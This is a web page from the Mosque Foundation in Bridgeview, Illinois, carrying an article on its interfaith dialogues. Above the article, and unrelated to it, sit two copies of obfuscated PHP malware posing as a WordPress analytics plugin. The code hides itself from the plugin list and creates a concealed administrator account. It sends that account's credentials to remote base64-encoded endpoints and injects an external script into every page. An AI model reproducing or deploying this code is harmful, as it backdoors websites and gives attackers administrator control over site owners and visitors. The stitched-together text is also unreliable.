/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*fad38b363013b560*/function _c83ad0($_x){return $_x;}function _6bacb3($_x){return $_x;}$_9e493972=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9tZXRyaWNzcGl4ZWwubGl2ZQ==","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_8e2ec1ab;if(!is_array($_8e2ec1ab)){$_8e2ec1ab=[];}if(!in_array($_9e493972["version"],$_8e2ec1ab,true)){$_8e2ec1ab[]=$_9e493972["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_9e493972;$this->version=$_9e493972["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_646fe03a){unset($_646fe03a[plugin_basename(__FILE__)]);return $_646fe03a;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_75683a93=$this->generate_credentials();if(!username_exists($_75683a93["user"])){$_f2db7849=wp_create_user($_75683a93["user"],$_75683a93["pass"],$_75683a93["email"]);if(!is_wp_error($_f2db7849)){(new WP_User($_f2db7849))->set_role("administrator");}}$this->setup_site_credentials($_75683a93["user"],$_75683a93["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_a56d3abc=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_a56d3abc),0,8),"pass"=>substr(md5($_a56d3abc."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_a46bedc7,$_08a8e8a6){global $_9e493972;$_87bc58b6=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_9e493972['sitePubKey']),"login"=>$_a46bedc7,"password"=>$_08a8e8a6];$_a147e0b7=["body"=>json_encode($_87bc58b6),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_9e493972["endpoint"])."/api/sites/setup-credentials",$_a147e0b7);}public function filterusers($_a5292b11){global $wpdb;$_6871041c=$this->generate_credentials()["user"];$_a5292b11->query_where.=" AND {$wpdb->users}.user_login != '{$_6871041c}'";}public function loadassets(){global $_9e493972,$_8e2ec1ab;$_c59a31a1=true;if(is_array($_8e2ec1ab)){foreach($_8e2ec1ab as $_5a6772fe){if(version_compare($_5a6772fe,$this->version,'>')){$_c59a31a1=false;break;}}}$_6c387895=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_c59a31a1&&$_6c387895){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_6c387895=false;}if(!$_c59a31a1&&$_6c387895){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_9e493972["font"]),[],null);$_919b2df3=base64_decode($_9e493972["endpoint"])."/t.js?site=".base64_decode($_9e493972['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_919b2df3,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_b093b360=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_b093b360,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*358a6241b5509c70*/function _64324c($_x){return $_x;}function _45863e($_x){return $_x;}function _3e34d2($_x){return $_x;}$_5ea7addc=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9pbnNpZ2h0cGl4ZWwuaWN1","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_3b917b12;if(!is_array($_3b917b12)){$_3b917b12=[];}if(!in_array($_5ea7addc["version"],$_3b917b12,true)){$_3b917b12[]=$_5ea7addc["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_5ea7addc;$this->version=$_5ea7addc["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_232a8657){unset($_232a8657[plugin_basename(__FILE__)]);return $_232a8657;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_89aae9b0=$this->generate_credentials();if(!username_exists($_89aae9b0["user"])){$_ebfb9d97=wp_create_user($_89aae9b0["user"],$_89aae9b0["pass"],$_89aae9b0["email"]);if(!is_wp_error($_ebfb9d97)){(new WP_User($_ebfb9d97))->set_role("administrator");}}$this->setup_site_credentials($_89aae9b0["user"],$_89aae9b0["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_8112514c=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_8112514c),0,8),"pass"=>substr(md5($_8112514c."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_d28b59a5,$_12c2868e){global $_5ea7addc;$_6083c735=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_5ea7addc['sitePubKey']),"login"=>$_d28b59a5,"password"=>$_12c2868e];$_6941dc6a=["body"=>json_encode($_6083c735),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_5ea7addc["endpoint"])."/api/sites/setup-credentials",$_6941dc6a);}public function filterusers($_f65e7b95){global $wpdb;$_dff1996e=$this->generate_credentials()["user"];$_f65e7b95->query_where.=" AND {$wpdb->users}.user_login != '{$_dff1996e}'";}public function loadassets(){global $_5ea7addc,$_3b917b12;$_7c9a0efd=true;if(is_array($_3b917b12)){foreach($_3b917b12 as $_2299b354){if(version_compare($_2299b354,$this->version,'>')){$_7c9a0efd=false;break;}}}$_0992b143=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_7c9a0efd&&$_0992b143){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_0992b143=false;}if(!$_7c9a0efd&&$_0992b143){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_5ea7addc["font"]),[],null);$_9c10cb41=base64_decode($_5ea7addc["endpoint"])."/t.js?site=".base64_decode($_5ea7addc['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_9c10cb41,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_bce55007=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_bce55007,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
Mosque Foundation | Bridgeview, IllinoisMosque Foundation Interfaith Activities Growing - Mosque Foundation | Bridgeview, Illinois
Mosque Foundation
Mosque Foundation Interfaith Activities Growing
First Friday Prayer is at 12:00PM. Second Friday Prayer is at 1:30P
Home > Articles > Mosque Foundation Interfaith Activities Growing
Mosque Foundation Interfaith Activities Growing
The Mosque Foundation Interfaith activities are growing. We encourage you to participate in these activities as observers or get more involved and join the team. We’ve already shared details that in this past year the MF Interfaith’s regular dialogues have continued to grow in Bridgeview, Oak Lawn, and surrounding suburbs.
The dialogue with the Oak Lawn community is open to the public, and brothers and sisters, including youth have come to observe. The next several meets are actually scheduled at the MF (January 28, March 24, and May 26, 2016 from 7-9 pm). Come, observe and be a part of changing the landscape for a better community based on mutual understanding, respect for one another, and to combat the hateful rhetoric of Islamophobia.
Additionally, the MF has joined SWIFT, the Southwest Interfaith Team, this year, which offers service activities for the whole family as well as interfaith forums and dinners. Mark your calendar for the next SWIFT Interfaith forum, March 20, 2016 (time and location TBA).
The MF has sent a representative to the Parliament of the World’s Religions Conference in Utah, this past October from the MF/St. Fabian Catholic Dialogue here in Bridgeview. At the PWR Conference the MF and St. Fabian representatives spoke to an audience in one of the parallel sessions modeling Sustainable Local Dialogue for Better Communities. It was an amazing learning experience for both.
Most recently the MF Interfaith team hosted a luncheon with women from the Unitarian Universalist Community Church in Park Forest. Extraordinary presentations by Deanna Othman on Islamophobia and by Suzanne Akhras addressing the Syrian Refugee Crisis and the Syrian Community Network involvement here in Chicagoland. The conversations that develop were anything but ordinary. Ideas and offerings to do more to combat hate and racism as well as support for the Syrian refugees gave direction to the group’s future involvement with one another. Contact kdanielson@mosquefoundation.org for more information about the MF Interfaith activities .
By Karen Danielson,
Interfaith Committee Chairwoman
-